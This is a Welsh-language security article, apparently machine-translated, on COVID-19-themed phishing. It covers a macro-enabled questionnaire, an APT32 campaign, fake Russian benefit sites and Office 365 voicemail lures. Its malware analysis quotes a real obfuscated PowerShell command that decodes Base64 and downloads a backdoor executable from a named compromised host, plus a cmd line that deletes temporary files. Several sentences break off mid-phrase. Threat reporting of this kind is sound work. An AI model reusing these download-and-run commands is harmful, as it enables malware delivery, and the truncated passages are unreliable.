Mae ymosodwyr yn parhau i ecsbloetio pwnc COVID-19, gan greu mwy a mwy o fygythiadau i ddefnyddwyr sydd â diddordeb mawr ym mhopeth sy'n gysylltiedig â'r epidemig. YN
Cofiwch yn
Hoffech chi gael prawf am ddim ar gyfer COVID-19?
Enghraifft arwyddocaol arall o we-rwydo ar thema coronafirws oedd
Roedd hefyd yn hawdd argyhoeddi'r rhan fwyaf o ddefnyddwyr i alluogi macros. I wneud hyn, defnyddiwyd tric safonol: i lenwi'r holiadur, yn gyntaf mae angen i chi alluogi macros, sy'n golygu bod angen i chi redeg sgript VBA.
Fel y gallwch weld, mae'r sgript VBA wedi'i guddio'n arbennig rhag gwrthfeirysau.
Mae gan Windows nodwedd aros lle mae'r cais yn aros /T <eiliadau> cyn derbyn yr ateb “Ie” rhagosodedig. Yn ein hachos ni, arhosodd y sgript 65 eiliad cyn dileu ffeiliau dros dro:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Ac wrth aros, cafodd malware ei lawrlwytho. Lansiwyd sgript PowerShell arbennig ar gyfer hyn:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Ar ôl datgodio gwerth Base64, mae'r sgript PowerShell yn lawrlwytho'r drws cefn sydd wedi'i leoli ar y gweinydd gwe a hacio'n flaenorol o'r Almaen:
http://automatischer-staubsauger.com/feature/777777.png
ac yn ei arbed dan yr enw:
C:UsersPublictmpdirfile1.exe
Ffolder ‘C:UsersPublictmpdir’
yn cael ei ddileu wrth redeg y ffeil 'tmps1.bat' sy'n cynnwys y gorchymyn cmd /c mkdir ""C:UsersPublictmpdir"".
Ymosodiad wedi'i dargedu ar asiantaethau'r llywodraeth
Yn ogystal, adroddodd dadansoddwyr FireEye yn ddiweddar ymosodiad APT32 wedi'i dargedu wedi'i anelu at strwythurau'r llywodraeth yn Wuhan, yn ogystal â Gweinyddiaeth Rheoli Argyfyngau Tsieineaidd. Roedd un o'r RTFs a ddosbarthwyd yn cynnwys dolen i erthygl yn y New York Times o'r enw
Yn ddiddorol, ar adeg eu canfod, nid oedd yr un o'r gwrthfeirysau wedi canfod yr achos hwn, yn ôl Virustotal.
Pan fydd gwefannau swyddogol i lawr
Digwyddodd yr enghraifft fwyaf trawiadol o ymosodiad gwe-rwydo yn Rwsia y diwrnod o'r blaen. Y rheswm am hyn oedd penodi budd-dal hir-ddisgwyliedig i blant 3 i 16 oed. Pan gyhoeddwyd dechrau derbyn ceisiadau ar Fai 12, 2020, rhuthrodd miliynau i wefan Gwasanaethau’r Wladwriaeth am gymorth hir-ddisgwyliedig a dod â’r porth i lawr heb fod yn waeth nag ymosodiad DDoS proffesiynol. Pan ddywedodd yr arlywydd “na allai Gwasanaethau’r Llywodraeth ymdopi â’r llif o geisiadau,” dechreuodd pobl siarad ar-lein am lansio gwefan amgen ar gyfer derbyn ceisiadau.
Y broblem yw bod sawl safle wedi dechrau gweithio ar unwaith, ac er bod un, yr un go iawn yn posobie16.gosuslugi.ru, mewn gwirionedd yn derbyn ceisiadau, mwy
Daeth cydweithwyr o SearchInform o hyd i tua 30 o barthau twyllodrus newydd yn y parth .ru. Mae Infosecurity a Softline Company wedi olrhain mwy na 70 o wefannau gwasanaeth ffug tebyg gan y llywodraeth ers dechrau mis Ebrill. Mae eu crewyr yn trin symbolau cyfarwydd a hefyd yn defnyddio cyfuniadau o'r geiriau gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, ac ati.
Hype a pheirianneg gymdeithasol
Mae'r holl enghreifftiau hyn ond yn cadarnhau bod ymosodwyr yn llwyddo i roi gwerth ariannol ar bwnc coronafirws. A pho uchaf yw'r tensiwn cymdeithasol a'r materion mwy aneglur, y mwyaf o siawns sydd gan sgamwyr i ddwyn data pwysig, gorfodi pobl i roi'r gorau i'w harian ar eu pen eu hunain, neu hacio mwy o gyfrifiaduron.
Ac o ystyried bod y pandemig wedi gorfodi pobl a allai fod yn barod i weithio gartref yn llu, nid yn unig mae data personol, ond hefyd data corfforaethol mewn perygl. Er enghraifft, yn ddiweddar bu defnyddwyr Microsoft 365 (Office 365 yn flaenorol) hefyd yn destun ymosodiad gwe-rwydo. Derbyniodd pobl negeseuon llais enfawr “a gollwyd” fel atodiadau i lythyrau. Fodd bynnag, roedd y ffeiliau mewn gwirionedd yn dudalen HTML a anfonodd ddioddefwyr yr ymosodiad ati
Ffynhonnell: hab.com